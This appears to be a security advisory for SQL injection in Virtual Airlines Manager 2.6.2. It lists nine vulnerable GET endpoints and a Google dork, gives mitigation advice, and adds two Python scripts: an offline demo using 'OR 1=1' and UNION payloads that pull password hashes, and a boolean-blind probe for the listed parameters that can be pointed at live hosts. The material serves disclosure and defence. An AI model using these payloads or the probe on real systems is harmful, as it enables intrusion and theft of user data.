Vendor: Virtual Airlines Manager
By: Milad Karimi
CVSS: 5.5 (MEDIUM)
Vulnerability: SQL Injection
CWE: 89
Product Name: Virtual Airlines Manager
Affected Version From: 2.6.2002
Affected Version To: 2.6.2002
Patch Exists: NO
Platforms Tested: Ubuntu 19.04
Year: 2021

Virtual Airlines Manager 2.6.2 – ‘multiple’ SQL Injection

Virtual Airlines Manager 2.6.2 is vulnerable to SQL injection through several GET parameters handled by index.php: notam_id, airport, registry_id, plane_location, hub_id, pilot_id, event_id and tour_id. Each value reaches a database query without validation or parameter binding, so whoever sends the request can alter the query, which may lead to unauthorized access, data manipulation or disclosure of database contents. The published PoC below lists only the injection points, with an [SQLi] placeholder where the payload goes; page names such as plane_info_public and fleet_public suggest that some of these endpoints are reachable without logging in, although the advisory does not state this.

Mitigation:

Bind every GET value as a query parameter (prepared statements via PDO or mysqli in PHP) instead of concatenating it into the SQL text, and validate the expected type before use: the *_id parameters should be accepted only as integers, and values such as airport should be checked against the format the application expects. No fixed release is recorded here (Patch Exists: NO), so operators should apply these changes themselves, or restrict access to the affected pages, until a vendor update is available.
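As an added illustration of the root cause and the fix (this is not VAM's own code, which is PHP against MySQL, and not from the advisory author), the following Python script builds an in-memory SQLite stand-in for the lookup behind page=notam&notam_id=. A vulnerable handler splices the GET value into the query the way the advisory describes, beside a hardened one that type-checks and binds it. Table and column names, the sample rows and the two payloads are constructed for the example; the same pattern applies to each of the other listed parameters.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for two tables a VAM install might hold.
    Table names, column names and rows are assumptions for this example."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE notam (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO notam VALUES (1, 'Runway 09L closed');
        INSERT INTO notam VALUES (2, 'ILS 27R maintenance');
        CREATE TABLE pilots (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO pilots VALUES (1, 'admin', 'hash-of-admin-password');
    """)
    return con

def notam_vulnerable(con, notam_id):
    """The pattern behind the advisory: the raw GET value is spliced into the
    SQL text, so whoever sends the request decides what the WHERE clause says."""
    sql = "SELECT id, title FROM notam WHERE id = " + notam_id
    return con.execute(sql).fetchall()

def notam_fixed(con, notam_id):
    """Check the type the endpoint expects (a decimal integer id) and then pass
    the value as a bound parameter, so it can no longer change the query."""
    if not notam_id.isdigit():
        return []            # rejects "1 OR 1=1", "0 UNION ...", and so on
    return con.execute("SELECT id, title FROM notam WHERE id = ?",
                       (int(notam_id),)).fetchall()

# Two classic payloads standing in for the advisory's [SQLi] placeholder.
PAYLOAD_OR = "1 OR 1=1"                                        # dump every notam
PAYLOAD_UNION = "0 UNION SELECT id, password_hash FROM pilots"  # read another table

def demo():
    con = make_db()
    return {
        "vuln_or": sorted(notam_vulnerable(con, PAYLOAD_OR)),
        "vuln_union": notam_vulnerable(con, PAYLOAD_UNION),
        "fixed_or": notam_fixed(con, PAYLOAD_OR),
        "fixed_union": notam_fixed(con, PAYLOAD_UNION),
        "fixed_legit": notam_fixed(con, "2"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable handler returns both notams for the OR payload and the pilots row for the UNION payload; the hardened handler returns nothing for either and still serves a legitimate id. The integer check is the defence-in-depth layer, binding is the one that actually closes the hole: a bound value is sent to the database as data, never parsed as SQL.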

Exploit-DB raw data:

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04

[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]

[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]

[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]

[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]

[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]

[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]

[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
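To turn the list above into a repeatable check, the following added Python script (not part of the original advisory) builds the PoC URLs from the advisory's page/parameter pairs and runs a boolean-based differential against each one, in both an unquoted numeric context and a single-quoted string context. Because it has to run offline, the HTTP fetch is a constructed stand-in that emulates notam_id as a numeric sink and airport as a string sink and serves every other page as static; to use it against a test instance you are authorized to assess, replace fake_fetch with a real GET (urllib.request or similar) and supply a known-good seed value for each parameter.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# (page, GET parameter) pairs copied from the advisory's PoC list.
VAM_SINKS = [
    ("notam", "notam_id"),
    ("airport_info", "airport"),
    ("plane_info_public", "registry_id"),
    ("fleet_public", "plane_location"),
    ("hub", "hub_id"),
    ("pilot_details", "pilot_id"),
    ("event", "event_id"),
    ("tour_detail", "tour_id"),
]

# (condition true, condition false) pairs for an unquoted numeric context
# and for a single-quoted string context.
PAYLOADS = {
    "numeric": ("{v} AND 1=1", "{v} AND 1=2"),
    "string": ("{v}' AND '1'='1", "{v}' AND '1'='2"),
}

def build_url(base, page, param, value):
    """Rebuild base with ?page=...&param=value, URL-encoding the payload."""
    s = urlsplit(base)
    query = urlencode({"page": page, param: value})
    return urlunsplit((s.scheme, s.netloc, s.path, query, ""))

def boolean_probe(fetch, base, page, param, seed):
    """Return the contexts in which the sink behaves like boolean-blind SQLi:
    the true-condition page equals the baseline and the false one differs."""
    baseline = fetch(build_url(base, page, param, seed))
    hits = []
    for ctx, (true_tpl, false_tpl) in PAYLOADS.items():
        true_body = fetch(build_url(base, page, param, true_tpl.format(v=seed)))
        false_body = fetch(build_url(base, page, param, false_tpl.format(v=seed)))
        if true_body == baseline and false_body != baseline:
            hits.append(ctx)
    return hits

def probe_all(fetch, base, seeds=None):
    """Probe every advisory sink; seeds maps a parameter to a known-good value."""
    seeds = seeds or {}
    return {param: boolean_probe(fetch, base, page, param, seeds.get(param, "1"))
            for page, param in VAM_SINKS}

def fake_fetch(url):
    """Constructed stand-in for an HTTP GET so the probe runs offline. It
    emulates notam_id as an unquoted integer sink (a quote breaks the query)
    and airport as a quoted string sink; every other page is a fixed body."""
    q = dict(parse_qsl(urlsplit(url).query))
    page = q.get("page")
    if page == "notam":
        v = q["notam_id"]
        if "'" in v:
            return "MySQL error near '"
        return "no NOTAM found" if v.endswith("1=2") else "NOTAM #1: Runway 09L closed"
    if page == "airport_info":
        v = q["airport"]
        if v == "EGLL" or v.endswith("' AND '1'='1"):
            return "EGLL London Heathrow"
        return "unknown airport"
    return f"static page: {page}"

if __name__ == "__main__":
    base = "http://localhost/vam/index.php"   # host from the advisory's PoC URLs
    for param, ctxs in probe_all(fake_fetch, base, {"airport": "EGLL"}).items():
        print(f"{param}: {ctxs or 'no evidence'}")
```

Two caveats for real use: whole-body comparison is brittle against dynamic content (session tokens, timestamps), so compare on a stable marker or normalise the body first; and the string context matters for parameters such as airport and plane_location, whose names suggest text values, where a bare numeric payload never leaves the quoted literal and would wrongly report no evidence.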